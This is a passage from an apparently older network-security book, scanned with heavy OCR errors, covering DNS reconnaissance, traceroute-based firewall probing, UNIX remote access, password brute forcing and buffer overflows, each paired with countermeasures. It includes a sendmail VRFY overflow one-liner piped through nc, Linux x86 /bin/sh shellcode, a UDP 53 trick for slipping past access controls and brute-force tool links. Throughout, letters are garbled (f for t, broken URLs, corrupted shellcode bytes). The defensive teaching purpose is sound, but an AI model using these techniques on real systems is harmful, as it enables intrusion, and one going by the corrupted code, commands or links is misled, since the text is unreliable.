axfr: Using default directory: /root/axfrdb 
Found 2 name servers for domain 'Acme.net.': 

Text deleted. 

Received XXX answers (XXX records) . 

To query fhe axfr dafabase for fhe information you jusf obfained, you would type 
the following: 

[bash] $ axfrcat Acme.net 

Determine Mail Exchange (MX) Records 

Defermining where mail is handled is a greaf sfarfing place fo locafe fhe fargef organiza- 
tion's firewall network. Often in a commercial environment, mail is handled on the same 
system as the firewall, or af leasf on fhe same network. So we canusehostfo help harvesf 
even more information. 

[bash] $ host Acme.net 

Acme.net has address 10.10.10.1 

Acme.net mail is handled (pri=20) by smtp-forward.Acme.net 
Acme.net mail is handled (pri=10) by gate.Acme.net 

If ho St is used wifhouf any paramefers on jusf a domain name, if will fry fo resolve A 
records firsf, fhen MX records. The preceding informafion appears fo cross-reference 
wifh fhe whois ARIN search we previously performed. Thus, we can feel comforfable 
fhaf fhis is a nefwork we should be investigating. 

O Countermeasure: DNS Security 

DNS information provides a plefhora of informafion fo attackers, so if is imporfanf fo reduce 
fhe amoimf of informafion available fo fhe Infemef. From a hosf configuration perspec- 
tive, you should resfricf zone fransfers fo only aufhorized servers. For modern versions of 
BIND, fhe allow-transfer direcfive in fhe named.conf ii\e can be used fo enforce fhe resfric- 
fion. To resfricf zone fransfers in Microsoft's DNS, you can use fhe Nofify opfion. (See 
hffp://supporf. microsoft.com/supporf /kb/arficles/ql93/8/37.asp for more information.) 
For ofher nameservers, you should consul! fhe documenfafion fo defermine whaf sfeps 
are necessary fo resfricf or disable zone fransfers. 

On fhe nefwork side, you could configure a firewall or packef-filfering roufer fo deny 
all unaufhorized inbound connecfions fo TCP porf 53. Since name lookup requesfs are 
UDP and zone fransfer requesfs are TCP, fhis will effectively fhwarf a zone fransfer af- 
fempf. However, fhis coimfermeasure is a violation of fhe RFC, which sfafes fhaf DNS 
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queries greater than 512 bytes will be sent via TCP. In most cases, DNS queries will easily 
fit within 512 bytes. A better solution would be to implement cr)q)tographic Transaction 
Signatures (TSIGs) to allow only "trusted" hosts to transfer zone informafion. For a 
sfep-by-sfep example of how fo implemenf TSIG securify, see hffp://romana.ucd.ie/ 
james / fsig.hfml. 

Resfricfing zone fransfers will increase fhe fime necessary for affackers fo probe for 
IP addresses and hosfnames. However, since name lookups are sfill allowed, affackers 
could manually perform lookups agarnsf all IP addresses for a given nef block. There- 
fore, configure exfemal name servers fo provide informafion only abouf sysfems di- 
recfly connecfed fo fhe Infernef. Exfernal nameservers should never be configured fo 
divulge infernal nefwork informafion. This may seem like a frivial poinf, buf we have 
seen misconfigured nameservers fhaf allowed us fo pull back more fhan 16,000 infernal IP 
addresses and associafed hosfnames. Finally, we discourage fhe use of HINFO records. As 
you will see in lafer chapfers, you can idenfify fhe fargef sysfem's operafing sysfem wifh 
fine precision. However, HINFO records make if fhaf much easier fo programmafically 
cull pofenfially vulnerable sysfems. 



Step 4. Network Reconnaissance 

Now fhaf we have idenfified pofenfial nefworks, we can affempf fo defermine fheir nef- 
work fopology as well as pofenfial access pafhs info fhe nefwork. 



^^^■racerouting 



Popularity: 


9 


Simplicity: 


9 


Impact: 


2 


Risk Rating: 


7 



To accomplish fhis fask, we can use fhe traceroute (ftp://ffp.ee.lbl.gov/ 
fraceroufe.far.gz) program fhaf comes wifh mosf flavors of UNIX and is provided in Win- 
dows NT. In Windows NT, if is spelled tracert due fo fhe 8.3 legacy filename issues. 

Traceroute is a diagnostic fool originally written by Van Jacobson fhaf lefs you 
view fhe roufe fhaf an IP packef follows from one hosf fo fhe nexf. Traceroute uses fhe 
fime-fo-live (TTL) option in fhe IP packef fo elicif an ICMP TIME_EXCEEDED message 
from each roufer. Each roufer fhaf handles fhe packef is required fo decremenf fhe TTL 
held. Thus, fhe TTL field effectively becomes a hop counfer. We can use fhe funcfionalify 
of traceroute fo defermine fhe exacf pafh fhaf our packefs are faking. As menfioned 
previously, traceroute may allow you fo discover fhe nefwork fopology employed by 
fhe fargef nefwork, in addition fo identifying access confrol devices (application-based 
firewall or packef-filfering roufers) fhaf may be tittering our fraffic. 

Lef's look af an example: 
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[bash] $ traceroute Acme.net 

traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets 

1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms 

2 rtrl.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms 

3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms 

4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms 

5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms 

We can see the path of the packets leaving the router (gate) and traveling three hops 
(2-4) to the final destination. The packets go through the various hops without being 
blocked. From our earlier work, we know that the MX record for Acme.net points to 
gate.acme.net. Thus, we can assume this is a live host and that the hop before it (4) is the 
border router for the organization. Hop 4 could be a dedicated application-based 
firewall, or it could be a simple packet-filtering device — we are not sure yet. Generally, 
once you hit a live system on a network, the system before it is a device performing rout- 
ing functions (for example, a router or a firewall). 

This is a very simplistic example. But in a complex environment, there may be multiple 
routing paths, that is, routing devices with multiple interfaces (for example, a Cisco 7500 se- 
ries router). Moreover, each interface may have different access control lists (ACLs) applied. 
In many cases, some interfaces will pass your traceroute requests, while others will deny 
it because of the ACL applied. Thus, it is important to map your entire network using 
traceroute. After youtraceroute to multiple systems on the network, you can begin to 
create a network diagram that depicts the architecture of the Internet gateway and the loca- 
tion of devices that are providing access control functionality. We refer to this as an access 
path diagram. 

It is important to note that most flavors of traceroute in UNIX default to sending 
User Datagram Protocol (UDP) packets, with the option of using Internet Control 
Messaging Protocol (ICMP) packets with the -I switch. In Windows NT, however, the 
default behavior is to use ICMP echo request packets. Thus, your mileage may vary using 
each tool if the site blocks UDP vs. ICMP and vice versa. Another interesting option of 
traceroute includes the -g option that allows the user to specify loose source routing. 
Thus, if you believe the target gateway will accept source-routed packets (which is a car- 
dinal sin), you might try to enable this option with the appropriate hop pointers (see man 
traceroute in UNIX for more information). 

There are several other switches that we need to discuss that may allow you to bypass 
access control devices during our probe. The -p n option of traceroute allows you to 
specify a starting UDP port number (n) that will be incremented by 1 when the probe is 
launched. Thus, we will not be able to use a fixed port number without some modification to 
traceroute. Luckily, Michael Schiffman has created a patch (http:/ / www.packetfactory 
.net/Projects/firewalk/traceroute.diff) that adds the -S switch to stop port incrementation 
for traceroute version 1.4a5 (ftp.cerias.purdue.edu/pub/tools/ unix/netutils/ traceroute/ 
old/). This allows you to force every packet we send to have a fixed port number, in the 
hopes that the access control device will pass this traffic. A good starting port number 
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would be UDP port 53 (DNS queries). Since many sites allow inbound DNS queries, there is 
a high probability that the access control device wiU allow our probes through. 

[bash] $ traceroute 10.10.10.2 

traceroute to (10.10.10.2), 30 hops max, 40 byte packets 

1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms 

2 rtrl.bigisp.net (10.10.12.13)37.442 ms 35.183 ms 38.202 ms 

3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms 

4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms 

5 * * * 

^ *•*:•*: 



We can see here that our traceroute probes, which by default send out UDP pack- 
ets, were blocked by the firewall. 

Now lef's send a probe wifh a fixed porf of UDP 53, DNS queries: 

[bash] $ traceroute -S -p53 10.10.10.2 

traceroute to (10.10.10.2), 30 hops max, 40 byte packets 

1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms 

2 rtrl.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms 

3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms 

4 hssitrt.bigisp.net (10.11.31.14)47.352 ms 47.363 ms 45.914 ms 

5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms 

Because our packefs are now accepfable fo fhe access confrol devices (hop 4), fhey are 
happily passed. Thus, we can probe sysfems behind fhe access confrol device jusf by 
sending ouf probes wifh a desfinafion porf of UDP 53. Additionally, if you send a probe 
fo a sysfem fhaf has UDP porf 53 lisfening, you will nof receive a normal ICMP unreach- 
able message back. Thus, you will nof see a hosf displayed when fhe packef reaches ifs ul- 
fimafe desfinafion. 

Mosf of whaf we have done up fo fhis poinf wifh traceroute has been com- 
mand-line orienfed. For fhe graphically inclined, you can use VisualRoufe (hffp:/ /www 
.visualroufe.com) or NeoTrace (hffp:/ / www.neofrace.com/) fo perform your tiacerouting. 
VisualRoufe provides a graphical depiction of each nefwork hop and infegrafes fhis wifh 
who is queries. VisualRoufe, depicfed in Figure 1-6, is appealing fo fhe eye, buf does nof 
scale well for large-scale nefwork reconnaissance. 

There are addifional fechniques fhaf will allow you fo defermine specific ACLs fhaf 
are in place for a given access confrol device. Firewall protocol scanning is one such fech- 
nique and is covered in Chapfer 11. 
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Figure 1-6. VisualRoute, the Cadillac of traceroute tools, provides not just router hop information 
but also geographic location, whois lookups, and web server banner information. 



Q Countermeasure: Thwarting Network Reconnaissance 

In this chapter, we only touched upon network reconnaissance techniques. We shall see 
more intrusive techniques in the following chapters. There are, however, several coimter- 
measures that can be employed to thwart and identify fhe network reconnaissance probes 
discussed fhus far. Many of fhe commercial network infrusion defection sysfems (NIDSes) 
will defecf fhis fype of network reconnaissance. In addition, one of fhe besf free NIDS pro- 
grams, snorf (hffp: / /www .snorf.org/) by Marfy Roesch, can defecf fhis acfivify. If you are 
inferesfed in faking fhe offensive when someone fraceroufes fo you. Humble from Rhino9 
developed a program called RofoRoufer (http:/ / packefsform.securify.com /UNIX /loggers/ 
rr-l.O.fgz). This ufilify is used fo log incoming traceroute requesfs and generafe fake 
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responses. Finally, depending on your site's security paradigm, you may be able to config- 
ure your border routers to limit ICMP and UDP traffic fo specific sysfems, fhus mfnimizing 
your exposure. 



SUMMARY 

As you have seen, affackers can perform nefwork recormaissance or foofprinf your nef- 
work in many differenf ways. We have purposely limifed our discussion fo common 
fools and fechniques. Bear in mind, however, fhaf new fools are released daily. Moreover, 
we chose a simplistic example fo illusfrafe fhe concepfs of foofprinfing. Offen you will be 
faced wifh a daunting fask of frying fo identify and foofprinf fens or hundreds of do- 
mains. Therefore, we prefer fo aufomafe as many fasks as possible via a combination of 
shell and expect scripfs or perl programs. In addition, fhere are many affackers well 
schooled in performing nefwork recormaissance acfivifies wifhouf ever being discov- 
ered, and fhey are suifably equipped. Thus, if is imporfanf fo remember fo minimize fhe 
amounf and fypes of informafion leaked by your Infemef presence and fo implemenf vig- 
ilanf monitoring. 
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S ome feel drugs are about the only thing more addicting than obtaining root access 
on a UNIX system. The pursuit of root access dates back to the early days of UNIX, 
so we need to provide some historical background on its evolution. 

THE QUEST FOR ROOT 

In 1969, Ken Thompson, and later Dennis Ritchie, of AT&T decided that the MULTICS 
(Multiplexed Information and Computing System) project wasn't progressing as fast as 
they would have liked. Their decision to "hack up" a new operating system called UNIX 
forever changed the landscape of computing. UNIX was intended to be a powerful, ro- 
bust, multiuser operating system that excelled at rurming programs, specifically, small 
programs called tools. Security was not one of UNIX's primary design characteristics, al- 
though UNIX does have a great deal of security if implemented properly. UNIX's pro- 
miscuity was a result of the open nature of developing and enhancing the operating 
system kernel, as well as the small tools that made this operating system so powerful. The 
early UNIX environments were usually located inside Bell Labs or in a university setting 
where security was controlled primarily by physical means. Thus, any user who had 
physical access to a UNIX system was considered authorized. In many cases, implement- 
ing root-level passwords was considered a hindrance and dismissed. 

While UNIX and UNIX-derived operating systems have evolved considerably over 
the past 30 years, the passion for UNIX and UNIX security has not subsided. Many ardent 
developers and code hackers scour source code for potential vulnerabilities. Further- 
more, it is a badge of honor to post newly discovered vulnerabilities to security mailing 
lists such as Bugtraq. In this chapter, we will explore this fervor to determine how and 
why the coveted root access is obtained. Throughout this chapter, remember that in 
UNIX there are two levels of access: the all-powerful root and everything else. There is no 
substitute for root! 

A Brief Review 

You may recall that we discussed in Chapters 1 through 3 ways to identify UNIX systems 
and enumerate information. We used port scarmers such as nmap to help identify open 
TCP/UDP ports as well as to fingerprint the target operating system or device. We used 
rpcinfo and showmount to enumerate RPC service and NFS mount points, respec- 
tively. We even used the all-purpose net cat (nc) to grab barmers that leak juicy infor- 
mation such as the applications and associated versions in use. In this chapter, we will 
explore the actual exploitation and related techniques of a UNIX system. It is important to 
remember that footprinting and network reconnaissance of UNIX systems must be done 
before any type of exploitation. Footprinting must be executed in a thorough and me- 
thodical fashion to ensure that every possible piece of information is uncovered. Once we 
have this information, we need to make some educated guesses about the potential vul- 
nerabilities that may be present on the target system. This process is known as vulnerabil- 
ity mapping. 
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Vulnerability Mapping 

Vulnerability mapping is the process of mapping specific security attributes of a system to 
an associated vulnerability or potential vulnerability. This is a critical phase in the actual 
exploitation of a target system that should not be overlooked. It is necessary for attackers 
to map attributes such as listening services, specific version numbers of running servers 
(for example, Apache 1.3.9 being used for HTTP and sendmail 8.9.10 being used for 
SMTP), system architecture, and username information to potential security holes. There 
are several methods attackers can use to accomplish this task: 

T Manually map specific sysfem attributes against publicly available sources of 
vulnerability information such as Bugtraq, Computer Emergency Response 
Team advisories (www.cert.org), and vendor security alerts. Although this is 
tedious, it can provide a thorough analysis of potential vulnerabilities without 
actually exploiting the target system. 

■ Use public exploit code posted to various security mailing lists and any 
number of web sifes, or write your own code. This will determine the existence 
of a real vulnerabilify with a high degree of certainty. 

A Use automated vulnerability scanning tools to identify frue vulnerabilities. 
Respected commercial tools include the Internet Scanner from Internet Security 
Systems (www.iss.net) or CyberCop Scarmer from Nefwork Associates 
(www.nai.com). On the freeware side, Nessus (www.nessus.org) and SAINT 
(hftp:/ /www.wwdsi.com/saint/) show promise. 

All these methods have their pros and cons; however, it is important to remember 
that only uneducated attackers known as "script kiddies" will skip the vulnerability 
mapping stage by throwing everything and the kitchen sink at a system to get in without 
knowing how and why an exploit works. We have witnessed many real-life attacks 
where the perpetrators were trying to use UNIX exploits against a Windows NT system. 
Needless to say, these attackers were inexpert and unsuccessful. The following list sum- 
marizes key points to consider when performing vulnerabilify mapping: 

T Perform nefwork recormaissance againsf fhe fargef system. 

■ Map attributes such as operating system, architecture, and specific versions of 
listening services to known vulnerabilities and exploits. 

■ Perform fargef acquisition by identifying and selecting key systems. 

A Enumerate and prioritize potential points of entry. 

REMOTE ACCESS VERSUS LOCAL ACCESS 

The remainder of this chapter is broken into two major sections, remote and local access. 
Remote access is defined as gaining access via the network (for example, a lisfening 
service) or ofher communicafion channel. Local access is defined as having an actual 
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command shell or login to the system. Local access attacks are also referred to as privilege 
escalation attacks. It is important to understand the relationship between remote and local 
access. There is a logical progression where attackers remotely exploit a vulnerability in a 
listening service and then gain local shell access. Once shell access is obtained, the attack- 
ers are considered to be local on the system. We try to logically break out the types of af- 
facks fhaf are used fo gain remofe access and provide relevanf examples. Once remofe 
access is obfained, we explain common ways attackers escalafe fheir local privileges fo 
roof. Finally, we explain informafion-gafhering fechniques fhaf allow attackers fo garner 
informafion abouf fhe local sysfem so fhaf if can be used as a sfaging poinf for additional 
attacks. If is imporfanf fo remember fhaf fhis chapfer is nof a comprehensive book on 
UNIX securify; for fhaf we refer you fo Practical UNIX & Internet Security by Simson 
Garfinkel and Gene Spafford. Addifionally, fhis chapfer carmof cover every conceivable 
UNIX exploif and flavor of UNIX — fhaf would be a book in ifself . Rafher, we aim fo cafe- 
gorize fhese affacks and fo explain fhe fheory behind fhem. Thus, when a new affack is 
discovered, if will be easy fo undersfand how if works, fhough if was nof specifically cov- 
ered. We fake fhe "feach a man fo fish and feed him for life" approach rafher fhan fhe 
"feed him for a day" approach. 



REMOTE ACCESS 

As menfioned previously, remofe access involves nefwork access or access fo anofher 
communications charmel, such as a dial-in modem attached fo a UNIX sysfem. We find 
fhaf analog/ISDN remofe access securify af mosf organizations is abysmal. We are limif- 
ing our discussion, however, fo accessing a UNIX sysfem from fhe nefwork via TGP/IP. 
After all, TGP/IP is fhe cornerstone of fhe Infemef, and if is mosf relevanf fo our discus- 
sion on UNIX securify. 

The media would like everyone fo believe fhaf fhere is some sorf of magic involved 
wifh compromising fhe securify of a UNIX sysfem. In realify, fhere are fhree primary 
mefhods fo remofely circumvenfing fhe securify of a UNIX sysfem: 

1. Exploiting a lisfening service (for example, TGP/UDP) 

2. Routing fhrough a UNIX sysfem fhaf is providing securify befween two or 
more nefworks 

3. User-inifiafed remofe execufion affacks (for example, hostile web sife, Trojan 
horse email, and so on) 

Lef's fake a look af a few examples fo undersfand how differenf f 5 q)es of affacks fif 
info fhe preceding categories. 

T Exploit a Listening Service Someone gives you a user ID and password and 
says, "break into my system." This is an example of exploifing a lisfening 
service. How can you log in fo fhe sysfem if if is nof rurming a service fhaf 
allows interactive logins (telnet, ftp, rlogin, or ssh)? Whaf abouf when 
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the latest wuftp vulnerability of the week is discovered? Are your systems 
vulnerable? Potentially, but attackers would have to exploit a listening 
service, wuftp, to gain access. It is imperative to remember that a service 
must be listening to gain access. If a service is nof lisfening, if carmof be broken 
info remofely. 

■ Route Through a UNIX System Your UNIX firewall was circumvenfed by 
attackers. How is fhis possible? you ask. We don'f allow any inbound services, 
you say. In many insfances attackers circumvenf UNIX firewalls by source 
roufing packefs fhrough fhe firewall fo infernal sysfems. This feaf is possible 
because fhe UNIX kernel had IP forwarding enabled when fhe firewall 
application should have been performing fhis function. In mosf of fhese cases, 
fhe attackers never acfually broke info fhe firewall per se; fhey simply used 
if as a roufer. 

A User-Initiated Remote Execution Are you safe because you disabled all 
services on your UNIX sysfem? Maybe nof. Whaf if you surf fo 
www.evilhacker.org and your web browser execufes malicious code fhaf 
connecfs back fo fhe evil sife? This may allow evilhacker.org fo access your 
sysfem. Think of fhe implications of fhis if you were logged in wifh roof 
privileges while web surfing. Whaf if your sniffer is suscepfible fo a buffer 
overflow attack (http:/ /www .wOOwOO.org/advisories/snoop.hfml)? 

Throughouf fhis secfion, we will address specific remofe attacks fhaf fall under one of 
fhe preceding fhree cafegories. If you have any doubf abouf how a remofe attack is possi- 
ble, jusf ask yourself fhree questions: 

1. Is fhere a lisfening service involved? 

2. Does fhe sysfem perform roufing? 

3. Did a user or a user's software execute commands that jeopardized the security 
of fhe hosf sysfem? 

You are likely fo answer yes fo af leasf one quesfion. 




Brute Force Attacks 



Popularity: 


8 


Simplicity: 


7 


Impact: 


7 


Risk Rating: 


7 



We sfarf off our discussion of UNIX attacks wifh fhe mosf basic form of attack — ^brufe 
force password guessing. A brufe force affack may nof appear sexy, buf if is one of fhe 
mosf effecfive ways for affackers fo gain access fo a UNIX sysfem. A brufe force affack is 
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nothing more than guessing a user ID / password combination on a service that attempts 
to authenticate the user before access is granted. The most common t 5 ^es of service fhat 
can be brufe forced include fhe following: 

T telnet 

■ File Transfer Profocol (FTP) 

■ The "R" commands (rlogin, rsh, and so on) 

■ Secure Shell ( s s h) 

■ SNMP communify names 

■ Posf Office Profocol (POP) 

A H 5 ^erTexf Transport Protocol (HTTP/HTTPS) 

Recall from our network discovery and enumeration discussion the importance of 
identifying potential system user IDs. Services like finger, rusers, and sendmail 
were used to identify user accounts on a target system. Once attackers have a list of user 
accounts, they can begin trying to gain shell access to the target system by guessing the 
password associated with one of fhe IDs. Unforfunafely, many user accounts have either 
a weak password or no password at all. The best illustration of fhis axiom is fhe "Joe" ac- 
counf, where fhe user ID and password are identical. Given enough users, most systems 
will have at least one Joe account. To our amazement, we have seen thousands of Joe ac- 
counts over the course of performing our security reviews. Why are poorly chosen pass- 
words so common? Plain and simple: people don't know how to choose strong 
passwords and are not forced to do so. 

While it is entirely possible to guess passwords by hand, most passwords are guessed 
via an automated brute force utility. There are several tools that attackers can use to auto- 
mate brute forcing, including the following: 

T Brutus http://www.hoobie.net/brutus/ 

■ brute_web.c http://packetstorm.securify.com/Exploit_Code_Archive/ 
brute_web.c 

■ pop.c http://packetstorm.securify.eom/groups/ADM/ADM-pop.c 

■ middlefinger hffp:/ /www.njh.com/lafesf/9709/970916-05.hfml 

A TeeNet hffp://www .phenoelif.de/fn/ 

O Brute Force Countermeasure 

The besf defense for brute force guessing is to use strong passwords that are not easily 
guessed. A one-time password mechanism would be most desirable. Some freeware utili- 
ties that will help make brute forcing harder are lisfed in Table 8-1. 

In addition to these tools, it is important to implement good password management 
procedures and to use common sense. Consider the following: 
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T Ensure all users have a valid password. 

■ Force a password change every 30 days for privileged accounts and every 60 
days for normal users. 

■ Implement a minimum-length password length of six alphanumeric characters, 
preferably eight. 

■ Log multiple authentication failures. 

■ Configure services to discormect after three invalid login attempts. 

■ Implement account lockout where possible (be aware of potential denial of 
service issues of accounts being locked out intentionally by an attacker). 

■ Disable services that are not used. 

■ Implement password composition tools that prohibit the user from choosing a 
poor password. 

■ Don't use the same password for every system you log in to. 

■ Don't write down your password. 

■ Don't tell your password to others. 

■ Use one-time passwords when possible. 

A Ensure that default accoimts such as "setup" and "admin" do not have 
default passwords. 

For additional details on password security guidelines, see AusCERT SA-93:04. 



Tool 


Description 


Location 


S/Key 


One-time password 
system 


http: / / www.yak.net/skey/ 


One Time 


One-time 


ftp.nrl.navy.mil/pub/security/ opie 


Passwords In 

Everything 

(OPIE) 


password system 




Cracklib 


Password 
composition tool 


f tp :// ftp .cert .org / pub / tools / cracklib / 


Npasswd 


A replacement for 


http://www.utexas.edu/cc/unix/ 




the passwd 

command 


software/ npasswd / 


Table 8-1 . Freeware Tools That Help Protect Against Brute Force Attacks 
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Tool 


Description 


Location 


Secure Remofe 


A new 


http : / / srp .Stanford .edu / srp / 


Password 


mechanism for 
performing secure 
password-based 
aufhenficafion and 
key exchange over 
any f 5 q)e of network 




SSH 


"R" command 
replacemenf wifh 
encr 5 q)fion and RSA 
aufhenficafion 


http:/ /www.cs.hut.fi/ssh 


Table 8-1 . Freeware Tools That Help Protect Against Brute Force Attacks (continued) 



Data Driven Attacks 




Now that we've dispensed with the seemingly mundane password guessing attacks, we 
can explain the de facto standard in gaining remote access — data driven attacks. A data 
driven attack is executed by sending data to an active service that causes unintended or 
undesirable results. Of course, "iminfended and imdesirable resulfs" is subjecfive and 
depends on whefher you are fhe affacker or fhe person who programmed fhe service. 
From fhe affacker's perspective, fhe resulfs are desirable because fhey permif access fo 
fhe fargef sysfem. From fhe programmer's perspecfive, his or her program received unex- 
pecfed dafa fhaf caused imdesirable resulfs. Dafa driven attacks are cafegorized as eifher 
buffer overflow attacks or inpuf validation attacks. Each attack is described in defail nexf . 

Buffer Overflow Attacks 



Popularity: 


8 


Simplicity: 


8 


Impact: 


10 


Risk Rating: 


9 



In November 1996, fhe landscape of computing securify was forever alfered. The mod- 
erator of fhe Bugfraq mailing lisf, Aleph One, wrofe an arficle for fhe securify publication 
Phrack Magazine (issue 49) fitted "Smashing fhe Sfack for Fun and Protif." This arficle had a 
profound effecf on fhe sfafe of securify as if popularized how poor programming practices 
can lead fo securify compromises via buffer overflow attacks. Buffer overflow attacks date 
as far back as 1988 and fhe infamous Roberf Morris Worm rncidenf; however, useful infor- 
mation abouf specific defails of fhis attack was scanf until 1996. 



Chapter 8: Hacking UNIX 



313 



A bujfer overflow condition occurs when a user or process attempts to place more data 
into a buffer (or fixed array) fhan was originally allocafed. This type of behavior is associ- 
afed wifh specific C fimcfions like strcpy ( ) , strcat { ) , and sprintf ( ) , among ofh- 
ers. A buffer overflow condition would normally cause a segmenfafion violation fo occur. 
However, fhis t 5 ^e of behavior can be exploifed fo gain access fo fhe fargef sysfem. Al- 
fhough we are discussing remofe buffer overflow attacks, buffer overflow conditions oc- 
cur via local programs as well and will be discussed in more defail lafer. To undersfand 
how a buffer overflow occurs, lef's examine a very simplisfic example. 

We have a fixed-lengfh buffer of 128 byfes. Lef's assume fhis buffer defines fhe 
amounf of dafa fhaf can be stored as inpuf fo fhe VRFY command of sendmail. Recall 
from Chapter 3 fhaf we used VRFY fo help us identify potential users on fhe fargef sysfem 
by frying fo verify fheir email address. Lef us also assume fhaf sendmail is sef user ID 
(SUID) fo roof and rurming wifh roof privileges, which may or may nof be frue for every 
sysfem. Whaf happens if attackers cormecf fo fhe sendmail daemon and send a block of 
dafa consisfing of 1,000 "a"s fo fhe VRFY command rafher fhan a shorf username? 

echo "vrfy 'perl -e 'print "a" x 1000''" |nc www.targetsystem.com 25 

The VRFY buffer is overrun, as if was only designed fo hold 128 byfes. Sfuffing 1,000 
byfes info fhe VRFY buffer could cause a denial of service and crash fhe sendmail dae- 
mon; however, if is even more dangerous fo have fhe fargef sysfem execufe code of your 
choosing. This is exacfly how a successful buffer overflow attack works. 

Insfead of sending 1,000 letter "a"s fo fhe VRFY command, fhe attackers will send 
specific code fhaf will overflow fhe buffer and execufe fhe command /bin/sh. Recall 
fhaf sendmail is running as roof, so when /bin/ sh is executed, fhe attackers will have 
insfanf roof access. You may be wondering how sendmail knew fhaf fhe attackers 
wanted fo execufe /bin/sh. If's simple. When fhe attack is executed, special assembly 
code known as fhe egg is senf fo fhe VFRY command as parf of fhe acfual sfring used fo 
overflow fhe buffer. When fhe VFRY buffer is overrun, attackers can sef fhe refum ad- 
dress of fhe offending funcfion, allowing fhe affackers fo alfer fhe flow of fhe program. In- 
sfead of fhe funcfion refuming fo ifs proper memory locafion, fhe affackers execufe fhe 
nefarious assembly code fhaf was senf as parf of fhe buffer overflow dafa, which will run 
/bin/ sh wifh roof privileges. Game over. 

If is imperafive fo remember fhaf fhe assembly code is archifecfure and operating sys- 
fem dependenf. A buffer overflow for Solaris X86 running on Intel CPUs is complefely 
differenf from one for Solaris running on SPARC sysfems. The following listing illus- 
frafes whaf an egg, or assembly code specific fo Linux X86, looks like: 

char shellcode[] = 

" \ xeb\xlf \x5e\x8 9\x7 6\x08\x31\xc0\x88\x4 6\x07 \ x8 9\x4 6\x0c\xb0\x0b" 

" \ x8 9\xf 3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x8 9\xd8\x4 0\xcd" 

" \x80\xe8 \xdc\xff\xff \xff /bin/sh 

If should be evidenf fhaf buffer overflow attacks are exfremely dangerous and have 
resulfed in many securify-relafed breaches. Our example is very simplisfic — if is 
exfremely difficulf fo creafe a working egg. However, mosf sysfem-dependenf eggs have 
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already been created and are available via the Internet. The process of actually creating an 
egg is beyond the scope of fhis fexf, and fhe reader is advised fo review Aleph One's arti- 
cle in Phrack Magazine (49) af hffp:/ /www.2600.nef/phrack/p49-14.hfml. To beef up 
your assembly skills, consul! Panic — UNIX System Crash and Dump Analysis by Chris 
Drake and Kimberley Brown. In addition, fhe friendly Teso folks have creafed some fools 
fhaf will automatically generate shellcode. Hellkif, among ofher shellcode creation fools, 
can be found af hffp://feso.scene.af/releases.php3. 

Buffer Overflow Attack Countermeasures 

Secure Coding Practices The besf counfermeasure for buffer overflow is secure program- 
ming practices. Alfhough if is impossible fo design and code a program fhaf is complefely 
free of bugs, fhere are sfeps fhaf help minimize buffer overflow conditions. These recom- 
mendafions include fhe following: 

T Design fhe program from fhe oufsef wifh securify in mind. All too often, 
programs are coded hasfily in an efforf fo meef some program manager's 
deadline. Securify is fhe lasf ifem fo be addressed and falls by fhe wayside. 
Vendors border on being negligenf wifh some of fhe code fhaf has been 
released recenfly. Many vendors are well aware of such slipshod securify 
coding pracfices, buf do nof fake fhe time fo address such issues. Consul! fhe 
Secure UNIX Program FAQ af hffp:/ / www.whifefang.com/sup/index.hfml 
for more information. 

■ Consider the use of "safer" compilers such as SfackGuard from Immimix 
(hffp: / / www.cse.ogi.edu/DISC / projecfs / immunix / SfackGuard / ) . Their 
approach is fo immunize fhe programs af compile time fo help minimize fhe 
impacf of buffer overflow. Additionally, proof-of-concepf defense mechanisms 
include Libsafe (hffp:/ /www.bell-labs.com/org/11356/hfml/securify.hfml), 
which aims fo infercepf calls fo vulnerable functions on a sysfemwide basis. For 
a complefe descripfion of Libsafe's capabilities and gory defail on exacfly how 
buffer overflows work, see (hffp:/ /www .bell-labs.com/org/ 11356/docs/ 
libsafe.pdf ). Keep in mind fhaf fhese mechanisms are nof a silver bullef, and 
users should nof be lulled info a false sense of securify. 

■ Argumenfs should be validated when received from a user or program. This 
may slow down some programs, buf fends fo increase fhe securify of each 
applicafion. This includes bounds checking each variable, especially 
environmenf variables. 

■ Use secure routines such as f get ( ) , strncpy ( ) , and strncat ( ) , and check 
fhe refum codes from system calls. 

■ Reduce fhe amounf of code fhaf runs wifh roof privileges. This includes 
minimizing fhe use of SUID roof programs where possible. Even if a buffer 
overflow attack were executed, users would still have fo escalafe fheir 
privileges fo roof. 

A Above all, apply all relevanf vendor securify pafches. 
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Test and Audit Each Program It is important to test and audit each program. Many times 
programmers are unaware of a potential buffer overflow condifion; however, a fhird 
parfy can easily defecf such defecfs. One of fhe besf examples of fesfing and auditing 
UNIX code is the OpenBSD (www.openbsd.org) project run by Theo de Raadt. The 
OpenBSD camp continually audits their source code and has fixed hundreds of buffer 
overflow conditions, not to mention many other types of securify -related problems. It is 
this type of thorough auditing that has given OpenBSD a reputation for being one of fhe 
most secure free versions of UNIX available. 

Disable Unused or Dangerous Services We will continue fo address this point throughout 
the chapter. Disable unused or dangerous services if they are not essential to the opera- 
tion of fhe UNIX sysfem. Intruders can't break into a service that is not running. In addi- 
tion, we highly recommend the use of TCP Wrappers (tcpd) and xinetd 
(hffp: / / www.synack.nef / xinefd/) fo selecfively apply an access confrol lisf on a per-ser- 
vice basis wifh enhanced logging f eaf ures . Nof every service is capable of being wrapped . 
However, fhose fhaf are will greatly enhance your security posture. In addition to wrap- 
ping each service, consider using kernel-level packet filtering that comes standard with 
most free UNIX operating sysfems (for example, ipchains or net filter for Linux and 
ipf for BSD). For a good primer on using ipchains fo secure your sysfem, see 
hffp://www.linuxdoc.org/HOWTO/IPCHAINS-HOWTO.html. Ipf from Darren 
Reed is one of fhe better packages and can be added fo many differenf flavors of UNIX. 
